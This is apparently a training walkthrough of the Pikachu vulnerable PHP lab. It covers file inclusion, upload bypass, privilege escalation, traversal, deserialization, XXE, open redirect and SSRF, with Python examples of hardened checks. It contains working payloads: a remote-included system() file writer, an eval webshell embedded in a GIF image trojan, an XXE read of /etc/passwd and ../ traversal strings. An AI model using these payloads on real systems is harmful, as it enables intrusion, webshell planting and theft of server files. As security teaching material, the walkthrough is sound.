In the same way, because of design requirements the backend sometimes executes the user's input as part of its code, which creates a remote code execution vulnerability, whether through a function that evaluates code or through unsafe deserialization and the like.

Therefore, if an operation-class API has to be exposed to front-end users, the input to that interface must be checked strictly; a strict whitelist policy is the better approach.

The main point here is that the backend's eval() executes unfiltered user input as PHP code.

Enter the POC here


The system executes the php code and returns the execution result
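Added example, not the range's PHP: a Python equivalent of the spliced ping command beside the whitelisted form the paragraphs above recommend. ping -c 1 (Linux syntax) and the injectable run parameter are my assumptions; the parameter lets the hardened function be exercised without actually pinging.

```python
import ipaddress
import subprocess


def build_ping_vulnerable(ip: str) -> str:
    """What the range's backend effectively does: splice the POST field straight
    into a shell command line.  Returns the line the shell would receive."""
    return "ping -c 1 " + ip        # ';ls' or '| cat /etc/passwd' becomes part of it


def ping_hardened(ip: str, run=subprocess.run) -> list:
    """Whitelist policy: the value must parse as an IP address, and the command is
    executed as an argv list with shell=False, so ';', '|' and '`' carry no meaning.
    'run' is injectable only so the function can be called without a network."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        raise ValueError("refused, not an IP address: %r" % ip) from None
    argv = ["ping", "-c", "1", str(addr)]
    run(argv, shell=False, timeout=10, capture_output=True)
    return argv


def is_accepted(ip: str) -> bool:
    """Check the whitelist without executing anything."""
    try:
        ping_hardened(ip, run=lambda argv, **kw: None)
        return True
    except ValueError:
        return False
```

The two defences are independent: ipaddress rejects anything that is not an address, and shell=False means that even a value the check let through would be a single argv element rather than a command line. If host names must be accepted, validate them against a strict pattern and still never pass a shell string.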

File Inclusion

A file inclusion vulnerability arises when the code includes a file whose name is under the user's control, which may lead to command execution or arbitrary file reading. include(), require() and their _once variants are the common PHP inclusion functions.

Local file inclusion

Here is a selection box. Selecting a person's name displays that person's information, but note the URL


The filename parameter names the included file. Change it to another known system path, such as /etc/passwd on Linux; ../ denotes the parent directory, and adding enough of them climbs back to the root.


Accessing the link reads the passwd file and echoes it.

Remote file inclusion

The principle of remote file inclusion is the same as above, except that the included file is code at an external address. In a PHP environment the exploitation condition is that php.ini has allow_url_fopen on (the default) and allow_url_include on (off by default since PHP 5.2, so it has to have been enabled deliberately).

The normal request is


If the filename parameter is changed to the malicious file contained remotely, the system may execute the malicious script loaded remotely.

For example, to write a phpinfo page on the target site, first construct a piece of code that writes the file

<?php system("echo '<?php phpinfo();?>' >> phpinfo.php"); ?>

Place this file at an accessible address, such as http://a.com/phpinfo.txt, then construct the remote file inclusion POC and access it.


The backend loads the remote content and executes it, creating phpinfo.php; visiting phpinfo.php shows that our file was written and executed by the vulnerable site. Exploit successful.

Unsafe Filedownload

Arbitrary file download is caused by the download file name escaping the intended restriction: the backend splices the filename parameter submitted by the user into the path and serves it without any check. The vulnerability may lead to source code download, sensitive information leakage and so on.

The normal request is as follows; after sending it, kb.png is downloaded


Try modifying the filename parameter to download /etc/passwd through directory traversal, and access


Arbitrary file download succeeded.

Unsafe Fileupload

Pikachu only illustrates the principle of this vulnerability; to study it in detail, play the upload-labs range.

Arbitrary file upload is caused by the backend verifying the uploaded file's format, content and permissions too laxly. It can lead to a webshell being uploaded and the site being taken over or defaced.

Client check

Client-side upload checks are generally done in JS. Disabling JS with a browser plugin such as JS toggle, or deleting the code that checks the suffix, bypasses the limit. Since the client check usually judges the format by the file suffix, you can also rename the file to a legal suffix first, capture the upload packet, and change the file name back in burp before replaying.


MIME type check

Judging the file type by MIME type usually means taking the Content-Type field from the HTTP header. If the server only checks that this value is one of the allowed types, the restriction can be bypassed.

In PHP the $_FILES array holds files uploaded from the client to the server. It contains

$_FILES['file']['name']      # file name
$_FILES['file']['type']      # file type
$_FILES['file']['size']      # file size in bytes
$_FILES['file']['tmp_name']  # name of the temporary copy stored on the server
$_FILES['file']['error']     # upload error code

$_FILES['file']['type'] takes its value from the Content-Type described above, and since the Content-Type of the HTTP request is user-controllable, it can be bypassed.

Capture the upload request and change the Content-Type field to an allowed type.

getimagesize() validation

This PHP function determines the size and type of an image file. It reads the file bytes and judges the type from the first few, e.g. a file beginning with 89 50 4E 47 is a PNG. This prefix is what we generally call the file's magic number. getimagesize() can be bypassed by making an image horse (on Windows with a command such as copy /b pic.png + shell.php picshell.png), or by adding a header such as GIF89a directly in front of the trojan.

One problem remains: if the uploaded file is an image, how is the embedded malicious code executed? Accessing a file with a .png suffix directly just returns the image. Here the "combo" with file inclusion comes in: once the image horse is uploaded and its location is known, the file inclusion vulnerability described earlier can include it so that the code is parsed, and that is how this part is verified.
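Added example (not Pikachu code) covering the MIME-type and getimagesize() bypasses above: it builds a GIF89a image horse, shows that a check built only on Content-Type and magic bytes accepts it, and contrasts a stricter check. The PHP payload string is a placeholder of my own.

```python
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF89a": "gif",
    b"GIF87a": "gif",
    b"\xff\xd8\xff": "jpeg",
}
ALLOWED_EXT = {"png": "png", "gif": "gif", "jpg": "jpeg", "jpeg": "jpeg"}
ALLOWED_MIME = {"image/png", "image/gif", "image/jpeg"}


def image_type(data: bytes):
    """Roughly what getimagesize() does for the type: look at the magic bytes only."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def make_image_trojan(php: bytes = b"<?php @eval($_POST['cmd']); ?>") -> bytes:
    """The 'GIF89a header in front of the trojan' image horse (placeholder payload,
    assumed for the example)."""
    return b"GIF89a" + php


def magic_only_check(filename: str, content_type: str, data: bytes) -> bool:
    """The checks discussed above: client-supplied Content-Type plus magic number.
    Both are attacker-controlled, so the image horse passes whatever its suffix."""
    return content_type in ALLOWED_MIME and image_type(data) is not None


def strict_check(filename: str, content_type: str, data: bytes) -> bool:
    """Defence: suffix whitelist that must agree with the detected type, and refuse
    data carrying PHP or script tags even when it is otherwise a valid image."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = image_type(data)
    if ext not in ALLOWED_EXT or kind is None or ALLOWED_EXT[ext] != kind:
        return False
    return b"<?" not in data and b"<script" not in data.lower()
```

The tag scan in strict_check is a heuristic; what actually closes the hole is renaming the upload to a server-chosen name, re-encoding it through an image library so foreign bytes are dropped, and storing it where the web server will not execute scripts, so that even an included image horse has nothing to run.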

Over permission

If user A's privileges are used to operate on user B's data, where A's privileges are no greater than B's, and the operation succeeds, that is an over-permission (broken access control) operation. It is caused by unreasonable permission checks in the backend. Over-permission vulnerabilities typically appear where pages that require login add, delete, modify or query data: when a user performs such an operation, the backend has to verify that the current user has permission for it before responding, and if the check is too simple the vulnerability appears.

Therefore, permission management should follow:
1. Grant users privileges on the principle of least privilege;
2. Use reasonable (strict) permission verification rules;
3. Judge permissions from the backend login state, never from conditions passed in by the front end;

Horizontal privilege escalation

A and B are users of the same level. For example, after A logs in he can view his own information; he notices a username parameter in the request that fetches it, and by modifying username he can view B's personal information. That is horizontal privilege escalation.

Here, it is observed that when you log in to lucy account to view personal information, the request is as follows:


Change username to kobe


It successfully shows kobe's personal information, and the horizontal privilege escalation is verified.

Vertical privilege escalation

Vertical privilege escalation is an ordinary user gaining the operations of an administrator. Here administrators can view and add users, while ordinary users can only view them. The verification process:

  1. Log in with the administrator account, add a new user, and capture the request.
  2. Log out of the administrator account and replay the add-user request; the user cannot be added.
  3. Log in as an ordinary user, who has no add-user permission, replace the Cookie in the request captured in step 1 with the ordinary user's, and replay the add-user request.
  4. The user is added successfully, so the vertical privilege escalation is verified.
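The two over-permission cases above, horizontal (viewing another user's profile through the username parameter) and vertical (an ordinary session calling the add-user action), as an added Python example that is not Pikachu's PHP; the session table, cookie values and profile data are constructed:

```python
# Constructed server-side state standing in for Pikachu's session store and member data.
SESSIONS = {
    "PHPSESSID=lucy-session": {"user": "lucy", "role": "user"},
    "PHPSESSID=admin-session": {"user": "admin", "role": "admin"},
}
PROFILES = {
    "lucy": {"email": "lucy@pikachu.com", "phone": "18888888888"},
    "kobe": {"email": "kobe@pikachu.com", "phone": "18666666666"},
}
USERS = {"lucy", "kobe", "admin"}


def view_profile_vulnerable(cookie, username):
    """Horizontal over-permission: login is checked, but the username comes from the request."""
    if cookie not in SESSIONS:
        raise PermissionError("login required")
    return PROFILES[username]


def view_profile_fixed(cookie, username):
    """The identity is taken from the server-side session; a mismatching parameter is refused."""
    sess = SESSIONS.get(cookie)
    if sess is None:
        raise PermissionError("login required")
    if username != sess["user"]:
        raise PermissionError("cannot view another user's profile")
    return PROFILES[username]


def add_user_vulnerable(cookie, new_user):
    """Vertical over-permission: any valid session may call the admin-only action."""
    if cookie not in SESSIONS:
        raise PermissionError("login required")
    USERS.add(new_user)
    return True


def add_user_fixed(cookie, new_user):
    """The role is checked against the session record, never against a field the client sends."""
    sess = SESSIONS.get(cookie)
    if sess is None or sess["role"] != "admin":
        raise PermissionError("admin role required")
    USERS.add(new_user)
    return True


def allowed(action, *args):
    """True if the action completes, False if the access check rejects it."""
    try:
        action(*args)
        return True
    except PermissionError:
        return False
```

Note that in the fixed versions the request no longer carries anything the server trusts about identity or role; the username parameter is compared against the session rather than used, which is rule 3 from the list above in code.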


Directory traversal

Directory traversal is also caused by incomplete restrictions on the data the user submits. For example, ../ in Linux means the parent directory; with enough of them the path climbs out of every directory and ends up at the root. We can build the path ../../../../etc/passwd to access files such as /etc/passwd.

Normal request


Replace the filename parameter in the URL.


The unexpected file is read successfully.
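The three ../ cases on this page (local file inclusion, arbitrary file download and this directory traversal) share one root cause and one fix, so here is a single added example for all of them, mine rather than the range's code, that resolves the requested name and refuses anything outside the served directory; the directory layout and file contents are constructed:

```python
import os
import tempfile


def vulnerable_path(base_dir: str, filename: str) -> str:
    """What the range does: splice the user's filename onto the directory, so
    '../' and absolute paths are honoured as written."""
    return os.path.join(base_dir, filename)


def safe_path(base_dir: str, filename: str) -> str:
    """Resolve the request and refuse anything that lands outside base_dir.
    realpath() collapses '../' and follows symlinks; commonpath() guards against
    prefix tricks such as /var/www/download_secret matching /var/www/download."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes the served directory: %r" % filename)
    return target


def demo():
    """Constructed layout: download/kb.png inside the served directory and a
    passwd-like file one level up.  Returns the verdicts of safe_path() and the
    text the vulnerable splice leaks."""
    root = tempfile.mkdtemp()
    downloads = os.path.join(root, "download")
    os.mkdir(downloads)
    with open(os.path.join(downloads, "kb.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)
    with open(os.path.join(root, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")     # constructed stand-in for /etc/passwd
    verdicts = {}
    for name in ("kb.png", "../passwd", "../../../../etc/passwd", "/etc/passwd"):
        try:
            safe_path(downloads, name)
            verdicts[name] = "allowed"
        except PermissionError:
            verdicts[name] = "blocked"
    with open(vulnerable_path(downloads, "../passwd")) as f:
        leaked = f.read()
    return verdicts, leaked
```

Even better than resolving paths is not taking a path at all: map an opaque identifier to a file name server-side, as a whitelist of the files the feature is meant to serve.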

Leakage of sensitive information

Sensitive information disclosure means information that should not be public has been placed where the public can read it. Any information a hacker can see that helps an intrusion counts as sensitive.

For example, the commented test username and password lili/123456 can be seen in the source of the login page; the pw field in the cookie after lili logs in is obviously weakly encoded; and deleting the file name from the URL path lists the files in that directory and reveals middleware information. All of these are sensitive information disclosure.

PHP deserialization

PHP serialization turns an object into a string that can be transmitted, and deserialization turns the transmitted string back into an object. The PHP functions that implement them are serialize() and unserialize(). Refer to the serialization example in the Pikachu range:

class S{
    public $test="pikachu";
}
$s = new S();        //Create a new object
echo serialize($s);  //Serialize object $s

After serializing this object you get O:1:"S":1:{s:4:"test";s:7:"pikachu";}
O-------object
1-------length of the class name
S-------class name
1-------number of properties in the object
s-------string data type
4-------length of the property name
test----property name
s-------string data type
7-------length of the property value
pikachu-property value


// Deserialization
$u = unserialize('O:1:"S":1:{s:4:"test";s:7:"pikachu";}');
echo $u->test; //Gets the value of test, pikachu

// If the deserialized content is user-controlled and the backend misuses PHP's magic methods, security problems follow. Common magic methods:
__construct()  // called when an object is created
__destruct()   // called when an object is destroyed
__toString()   // called when an object is used as a string
__sleep()      // called before an object is serialized
__wakeup()     // called immediately after an object is unserialized
// Vulnerable example
class S{
    var $test = "pikachu";
    function __destruct(){
        echo $this->test;
    }
}
$s = $_GET['test'];
@$unser = unserialize($s);


The function here takes a piece of serialized data as input. Auditing the source, the S object rebuilt from that data runs echo when it is destroyed and returns the value of its test property. If a normal structure is submitted, such as


pikachu is returned after submission, but if the submitted payload is constructed as follows


then when S runs its __destruct() method it echoes the JS script, and XSS is achieved in the front end.

It is difficult to find deserialization vulnerabilities by black-box testing; in general they are found by source code audit.
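To make the length fields concrete, an added example (not the range's PHP) that builds and parses the O:1:"S":1:{...} format from Python, including the XSS payload for the S class above; editing a value by hand without updating its length is exactly what makes unserialize() reject the string:

```python
def php_serialize_string(s: str) -> str:
    """s:<byte length>:"<value>";  PHP counts bytes, not characters."""
    return 's:%d:"%s";' % (len(s.encode("utf-8")), s)


def php_serialize_object(cls: str, props: dict) -> str:
    """O:<len>:"<class>":<count>:{<name><value>...}, for string-valued properties."""
    body = "".join(php_serialize_string(k) + php_serialize_string(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (len(cls.encode("utf-8")), cls, len(props), body)


def php_unserialize_object(data: str):
    """Minimal parser for the subset above; returns (class_name, {prop: value}).
    Raises ValueError where PHP's unserialize() would return false."""
    pos = 0

    def expect(tok):
        nonlocal pos
        if not data.startswith(tok, pos):
            raise ValueError("expected %r at offset %d" % (tok, pos))
        pos += len(tok)

    def read_int(term):
        nonlocal pos
        end = data.index(term, pos)
        value = int(data[pos:end])
        pos = end + 1
        return value

    def read_str():
        nonlocal pos
        expect("s:")
        n = read_int(":")
        expect('"')
        raw = data[pos:].encode("utf-8")[:n].decode("utf-8")   # n is a byte count
        pos += len(raw)
        expect('";')
        return raw

    expect("O:")
    n = read_int(":")
    expect('"')
    cls = data[pos:pos + n]
    pos += n
    expect('":')
    count = read_int(":")
    expect("{")
    props = {}
    for _ in range(count):
        key = read_str()
        props[key] = read_str()
    expect("}")
    if pos != len(data):
        raise ValueError("trailing data")
    return cls, props


def is_valid(data: str) -> bool:
    try:
        php_unserialize_object(data)
        return True
    except ValueError:
        return False


# The payload for the __destruct() echo above: the length 25 must match the script text.
XSS_PAYLOAD = php_serialize_object("S", {"test": "<script>alert(1)</script>"})
```

Parsing also shows why user-controlled unserialize() is dangerous in general: the class name in the string decides which class is instantiated, so any class with a useful __destruct() or __wakeup() on the include path is reachable; the fix is to exchange data as JSON, or to pass allowed_classes to unserialize().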


XXE

XXE, XML External Entity injection. XML is designed to transfer and store data and consists mainly of three parts; for what XML is, see an XML tutorial

<!-- XML declaration -->
<?xml version="1.0" encoding="UTF-8"?>

<!-- Document type definition (DTD): the part where XXE goes wrong -->
<!-- 1. Internal DTD -->
<!DOCTYPE root-element [element declarations]>
<!-- 2. External DTD reference -->
<!DOCTYPE root-element SYSTEM "URI of the external DTD">
<!-- 3. Public DTD reference -->
<!DOCTYPE root-element PUBLIC "DTD name" "URI of the public DTD">

<!-- Document element: the actual data -->
<body>Don't forget me this weekend!</body>

Reading the source in the range, the XML document data is read and output inside a <pre> tag. If the XML cannot be read or is malformed, the page returns "XML declaration, DTD document type definition, document element, do you understand them all?".

Following the external entity structure, the payload for reading /etc/passwd is

<?xml version="1.0"?>
<!DOCTYPE x [
    <!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>

simplexml_load_string() in PHP converts an XML document into a SimpleXMLElement object. PHP parses XML with libxml, and since libxml 2.9.0 loading of external entities is disabled by default, so later versions have no XXE by default unless the code re-enables it, e.g. by passing LIBXML_NOENT as the options argument, which is what the range does.
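An added Python example, not Pikachu's PHP, of the same external-entity read with expat through xml.sax, where the feature_external_ges flag plays the role of libxml's entity loader (LIBXML_NOENT in PHP). The file it reads is a constructed stand-in for /etc/passwd written to a temp file:

```python
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, like the range's output inside the <pre> tag."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse(xml_bytes: bytes, load_external_entities: bool) -> str:
    """Parse with expat via xml.sax.  With the feature on, &f; is replaced by the
    contents of the SYSTEM URI (the XXE); with it off, the reference yields nothing."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, load_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def xxe_payload(file_uri: str) -> bytes:
    """The payload from the text with the target file substituted."""
    return ('<?xml version="1.0"?>'
            '<!DOCTYPE x [<!ENTITY f SYSTEM "%s">]>'
            '<x>&f;</x>' % file_uri).encode()


def demo():
    """Returns (text from the permissive parser, text from the safe parser)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed stand-in for /etc/passwd
        path = f.name
    try:
        payload = xxe_payload(Path(path).as_uri())
        return parse(payload, True), parse(payload, False)
    finally:
        os.unlink(path)
```

The same single switch exists in every XML stack; the practical check on a code base is to grep for wherever it is turned on (LIBXML_NOENT, libxml_disable_entity_loader(false), setFeature calls, DocumentBuilderFactory settings) rather than to trust the library default.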

Unsafe URL redirect

Unsafe URL redirects can occur wherever a URL redirect is performed.
If the backend uses a parameter passed in from the front end (a user's parameter, or a URL embedded in the front-end page) as the redirect destination without checking it, the "redirect to the wrong place" problem arises.

The direct harm of an unsafe redirect is phishing: the attacker uses the vulnerable party's domain name as cover (a well-known company's domain makes users click without worry), and the final destination is in fact a phishing site.

Here there is a hyperlink ("young people are like the autumn wind")


Clicking the link redirects to the unsafere.php page

But if the url parameter is modified, for example to construct


visiting the link redirects to Baidu. Ordinary users look at the domain name first and believe they are visiting the xxx site, but the arbitrary URL redirect has sent them off to some other phishing page.


SSRF

Server-side request forgery usually occurs when server A has a function for fetching data from server B but places no restriction on the request target. The attacker can then use server A to access server B, or any other machine on the same intranet as server A. This vulnerability is usually used for intranet information gathering.

Improper use of PHP functions such as curl_exec() and file_get_contents(), shown below, can cause SSRF:


From the source, this function passes the address given in the url parameter to curl_exec(), which performs the request, and returns the result to the front end. If the url parameter is replaced with http://xxxx or another protocol supported by curl, curl will execute it (curl supports telnet, ftp, ftps, dict, file, ldap, etc.)


file_get_contents() is the preferred way of reading a file's contents into a string, and the logic here is the same as before. It supports reading remote or local files over several protocols and, more importantly, PHP's pseudo-protocols (stream wrappers), so we can use a wrapper such as php://filter to read local source code.
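One added Python example (mine, not the range's PHP) for both the unsafe URL redirect section above and this SSRF section: a redirect check that accepts only same-site targets, and a fetch-target check that refuses non-http schemes (file://, dict://, php://...) and any host that resolves to a private, loopback or link-local address. pikachu.example as the site host and the fake resolver table are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

SITE_HOSTS = {"pikachu.example"}        # constructed: the vulnerable site's own host name(s)


def is_safe_redirect(url: str) -> bool:
    """Open-redirect check: same-site paths or absolute URLs to our own host only.
    Refuses '//evil.com', 'https:evil.com', 'javascript:', userinfo tricks and
    control characters or backslashes that browsers normalise differently."""
    if not url or any(c in url for c in "\\\r\n\t"):
        return False
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "":
        return url.startswith("/") and not url.startswith("//")
    return (parts.scheme in ("http", "https") and parts.username is None
            and parts.hostname in SITE_HOSTS)


def is_safe_fetch_target(url: str, resolve) -> bool:
    """SSRF check for a curl_exec()/file_get_contents() style fetcher: http(s) only
    (no file://, dict://, gopher://, php://...), no embedded credentials, and every
    address the host resolves to must be globally routable.  resolve(host) -> [ip, ...]
    is injected so the check runs offline; in production resolve once, connect to the
    checked address, and re-run the check on every redirect."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname or parts.username:
        return False
    try:
        addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    except ValueError:
        return False
    return bool(addrs) and all(a.is_global for a in addrs)


def fake_resolve(host: str):
    """Constructed stand-in for DNS; a literal IP resolves to itself."""
    table = {
        "www.example.com": ["93.184.216.34"],
        "localtest.me": ["127.0.0.1"],            # public name pointing at the host itself
        "metadata.internal": ["169.254.169.254"],
        "pikachu.example": ["10.0.0.5"],
    }
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return table.get(host, [])
```

Checking the resolved address rather than the host name is what stops the localtest.me style of bypass; a scheme allowlist alone would still let "http://127.0.0.1:6379/" through, and a host allowlist alone would not cover the pseudo-protocols file_get_contents() accepts.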


Topics: PHP Database SQL xml